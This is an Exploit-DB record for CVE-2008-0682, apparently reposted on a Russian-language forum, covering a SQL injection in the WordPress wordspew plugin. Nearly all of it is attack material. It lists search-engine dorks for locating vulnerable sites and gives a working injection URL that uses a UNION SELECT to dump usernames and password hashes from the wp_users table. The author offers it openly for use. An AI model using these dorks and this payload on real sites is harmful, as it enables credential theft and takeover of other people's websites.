- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5039
- Проверка EDB
-
- Пройдено
- Автор
- S@BUN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0682
- Дата публикации
- 2008-02-02
Код:
#########################################################################
#
# Wordpress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
DORK 1 : allinurl: "wordspew-rss.php"
DORK 2 : allinurl: "wp-content/plugins/wordspew"
DORK 3 : allinurl: "wordspew/wordspew-rss.php"
#########################################################################
EXPLOIT :
wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
# milw0rm.com [2008-02-02]- Источник
- www.exploit-db.com
